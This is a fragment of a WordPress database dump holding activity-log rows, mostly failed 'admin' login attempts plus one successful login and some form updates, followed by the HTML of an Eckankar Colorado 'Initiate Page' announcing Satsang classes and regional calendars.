STAGING'),(234217,39789,'plugin_current_version','3.0.6'),(234218,39789,'plugin_new_version','3.1.0'),(234219,39789,'_message_key','plugin_update_available'),(234220,39789,'_server_remote_addr','173.231.231.x'),(234221,39790,'failed_username','admin'),(234222,39790,'server_http_user_agent','Mozilla/5.0'),(234223,39790,'_message_key','user_unknown_login_failed'),(234224,39790,'_server_remote_addr','20.163.19.x'),(234225,39791,'failed_username','admin'),(234226,39791,'server_http_user_agent','Mozilla/5.0'),(234227,39791,'_message_key','user_unknown_login_failed'),(234228,39791,'_server_remote_addr','20.163.19.x'),(234229,39792,'failed_username','admin'),(234230,39792,'server_http_user_agent','Mozilla/5.0'),(234231,39792,'_message_key','user_unknown_login_failed'),(234232,39792,'_server_remote_addr','20.163.19.x'),(234233,39793,'failed_username','admin'),(234234,39793,'server_http_user_agent','Mozilla/5.0'),(234235,39793,'_message_key','user_unknown_login_failed'),(234236,39793,'_server_remote_addr','20.163.19.x'),(234237,39794,'failed_username','admin'),(234238,39794,'server_http_user_agent','Mozilla/5.0'),(234239,39794,'_message_key','user_unknown_login_failed'),(234240,39794,'_server_remote_addr','20.163.19.x'),(234241,39795,'failed_username','admin'),(234242,39795,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(234243,39795,'_message_key','user_unknown_login_failed'),(234244,39795,'_server_remote_addr','37.187.135.x'),(234245,39796,'failed_username','admin'),(234246,39796,'server_http_user_agent','Mozilla/5.0'),(234247,39796,'_message_key','user_unknown_login_failed'),(234248,39796,'_server_remote_addr','20.163.19.x'),(234249,39797,'failed_username','admin'),(234250,39797,'server_http_user_agent','Mozilla/5.0'),(234251,39797,'_message_key','user_unknown_login_failed'),(234252,39797,'_server_remote_addr','20.163.19.x'),(234253,39798,'failed_username','wadminw'),(234254,39798,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(234255,39798,'_message_key','user_unknown_login_failed'),(234256,39798,'_server_remote_addr','67.205.12.x'),(234257,39799,'failed_username','admin'),(234258,39799,'server_http_user_agent','Mozilla/5.0'),(234259,39799,'_message_key','user_unknown_login_failed'),(234260,39799,'_server_remote_addr','20.163.19.x'),(234261,39800,'failed_username','admin'),(234262,39800,'server_http_user_agent','Mozilla/5.0'),(234263,39800,'_message_key','user_unknown_login_failed'),(234264,39800,'_server_remote_addr','20.163.19.x'),(234265,39801,'failed_username','admin'),(234266,39801,'server_http_user_agent','Mozilla/5.0'),(234267,39801,'_message_key','user_unknown_login_failed'),(234268,39801,'_server_remote_addr','20.163.19.x'),(234269,39802,'failed_username','admin'),(234270,39802,'server_http_user_agent','Mozilla/5.0'),(234271,39802,'_message_key','user_unknown_login_failed'),(234272,39802,'_server_remote_addr','20.163.19.x'),(234273,39803,'failed_username','admin'),(234274,39803,'server_http_user_agent','Mozilla/5.0'),(234275,39803,'_message_key','user_unknown_login_failed'),(234276,39803,'_server_remote_addr','20.163.19.x'),(234277,39804,'failed_username','admin'),(234278,39804,'server_http_user_agent','Mozilla/5.0'),(234279,39804,'_message_key','user_unknown_login_failed'),(234280,39804,'_server_remote_addr','20.163.19.x'),(234281,39805,'failed_username','bapaksaya'),(234282,39805,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(234283,39805,'_message_key','user_unknown_login_failed'),(234284,39805,'_server_remote_addr','35.201.26.x'),(234285,39805,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(234286,39806,'failed_username','wordpress_administrator'),(234287,39806,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(234288,39806,'_message_key','user_unknown_login_failed'),(234289,39806,'_server_remote_addr','201.48.224.x'),(234290,39806,'_server_http_referer','HTTPS://ECKANKAR-COLORADO.ORG/wp-login.php'),(234291,39807,'failed_username','admin'),(234292,39807,'server_http_user_agent','Mozilla/5.0'),(234293,39807,'_message_key','user_unknown_login_failed'),(234294,39807,'_server_remote_addr','20.163.19.x'),(234295,39808,'failed_username','admin'),(234296,39808,'server_http_user_agent','Mozilla/5.0'),(234297,39808,'_message_key','user_unknown_login_failed'),(234298,39808,'_server_remote_addr','20.163.19.x'),(234299,39809,'failed_username','admin'),(234300,39809,'server_http_user_agent','Mozilla/5.0'),(234301,39809,'_message_key','user_unknown_login_failed'),(234302,39809,'_server_remote_addr','20.163.19.x'),(234303,39810,'failed_username','admin'),(234304,39810,'server_http_user_agent','Mozilla/5.0'),(234305,39810,'_message_key','user_unknown_login_failed'),(234306,39810,'_server_remote_addr','20.163.19.x'),(234307,39811,'failed_username','administrator'),(234308,39811,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(234309,39811,'_message_key','user_unknown_login_failed'),(234310,39811,'_server_remote_addr','205.185.122.x'),(234311,39812,'failed_username','admin'),(234312,39812,'server_http_user_agent','Mozilla/5.0'),(234313,39812,'_message_key','user_unknown_login_failed'),(234314,39812,'_server_remote_addr','20.163.19.x'),(234315,39813,'failed_username','admin'),(234316,39813,'server_http_user_agent','Mozilla/5.0'),(234317,39813,'_message_key','user_unknown_login_failed'),(234318,39813,'_server_remote_addr','20.163.19.x'),(234319,39814,'failed_username','admin'),(234320,39814,'server_http_user_agent','Mozilla/5.0'),(234321,39814,'_message_key','user_unknown_login_failed'),(234322,39814,'_server_remote_addr','20.163.19.x'),(234323,39815,'failed_username','admin'),(234324,39815,'server_http_user_agent','Mozilla/5.0'),(234325,39815,'_message_key','user_unknown_login_failed'),(234326,39815,'_server_remote_addr','20.163.19.x'),(234327,39816,'failed_username','admin'),(234328,39816,'server_http_user_agent','Mozilla/5.0'),(234329,39816,'_message_key','user_unknown_login_failed'),(234330,39816,'_server_remote_addr','20.163.19.x'),(234331,39817,'failed_username','admin'),(234332,39817,'server_http_user_agent','Mozilla/5.0'),(234333,39817,'_message_key','user_unknown_login_failed'),(234334,39817,'_server_remote_addr','20.163.19.x'),(234335,39818,'failed_username','admin'),(234336,39818,'server_http_user_agent','Mozilla/5.0'),(234337,39818,'_message_key','user_unknown_login_failed'),(234338,39818,'_server_remote_addr','20.163.19.x'),(234339,39819,'failed_username','admin'),(234340,39819,'server_http_user_agent','Mozilla/5.0'),(234341,39819,'_message_key','user_unknown_login_failed'),(234342,39819,'_server_remote_addr','20.163.19.x'),(234343,39820,'failed_username','admin'),(234344,39820,'server_http_user_agent','Mozilla/5.0'),(234345,39820,'_message_key','user_unknown_login_failed'),(234346,39820,'_server_remote_addr','20.163.19.x'),(234347,39821,'failed_username','admin'),(234348,39821,'server_http_user_agent','Mozilla/5.0'),(234349,39821,'_message_key','user_unknown_login_failed'),(234350,39821,'_server_remote_addr','20.163.19.x'),(234351,39822,'failed_username','admin'),(234352,39822,'server_http_user_agent','Mozilla/5.0'),(234353,39822,'_message_key','user_unknown_login_failed'),(234354,39822,'_server_remote_addr','20.163.19.x'),(234355,39823,'failed_username','admin'),(234356,39823,'server_http_user_agent','Mozilla/5.0'),(234357,39823,'_message_key','user_unknown_login_failed'),(234358,39823,'_server_remote_addr','20.163.19.x'),(234359,39824,'failed_username','admin'),(234360,39824,'server_http_user_agent','Mozilla/5.0'),(234361,39824,'_message_key','user_unknown_login_failed'),(234362,39824,'_server_remote_addr','20.163.19.x'),(234363,39825,'failed_username','admin'),(234364,39825,'server_http_user_agent','Mozilla/5.0'),(234365,39825,'_message_key','user_unknown_login_failed'),(234366,39825,'_server_remote_addr','20.163.19.x'),(234367,39826,'failed_username','administrator'),(234368,39826,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(234369,39826,'_message_key','user_unknown_login_failed'),(234370,39826,'_server_remote_addr','199.195.250.x'),(234371,39827,'failed_username','admin'),(234372,39827,'server_http_user_agent','Mozilla/5.0'),(234373,39827,'_message_key','user_unknown_login_failed'),(234374,39827,'_server_remote_addr','20.163.19.x'),(234375,39828,'failed_username','admin'),(234376,39828,'server_http_user_agent','Mozilla/5.0'),(234377,39828,'_message_key','user_unknown_login_failed'),(234378,39828,'_server_remote_addr','20.163.19.x'),(234379,39829,'user_id','2'),(234380,39829,'user_email','nada@zipnadanot.org'),(234381,39829,'user_login','S8zhaBda'),(234382,39829,'_user_id','2'),(234383,39829,'_user_login','S8zhaBda'),(234384,39829,'_user_email','nada@zipnadanot.org'),(234385,39829,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(234386,39829,'_message_key','user_logged_in'),(234387,39829,'_server_remote_addr','76.130.120.x'),(234388,39829,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(234389,39830,'failed_username','admin'),(234390,39830,'server_http_user_agent','Mozilla/5.0'),(234391,39830,'_message_key','user_unknown_login_failed'),(234392,39830,'_server_remote_addr','20.163.19.x'),(234393,39831,'post_id','269253'),(234394,39831,'post_type','nf_sub'),(234395,39831,'post_title',''),(234396,39831,'_message_key','post_updated'),(234397,39831,'_server_remote_addr','72.19.140.x'),(234398,39831,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(234399,39832,'failed_username','admin'),(234400,39832,'server_http_user_agent','Mozilla/5.0'),(234401,39832,'_message_key','user_unknown_login_failed'),(234402,39832,'_server_remote_addr','20.163.19.x'),(234403,39833,'post_id','269254'),(234404,39833,'post_type','nf_sub'),(234405,39833,'post_title',''),(234406,39833,'_message_key','post_updated'),(234407,39833,'_server_remote_addr','83.136.182.x'),(234408,39833,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_5&utm_medium=email'),(234409,39834,'failed_username','admin'),(234410,39834,'server_http_user_agent','Mozilla/5.0'),(234411,39834,'_message_key','user_unknown_login_failed'),(234412,39834,'_server_remote_addr','20.163.19.x'),(234413,39835,'failed_username','admin'),(234414,39835,'server_http_user_agent','Mozilla/5.0'),(234415,39835,'_message_key','user_unknown_login_failed'),(234416,39835,'_server_remote_addr','20.163.19.x'),(234417,39836,'post_id','68102'),(234418,39836,'post_type','page'),(234419,39836,'post_title','Initiate Page'),(234420,39836,'post_prev_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK members who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 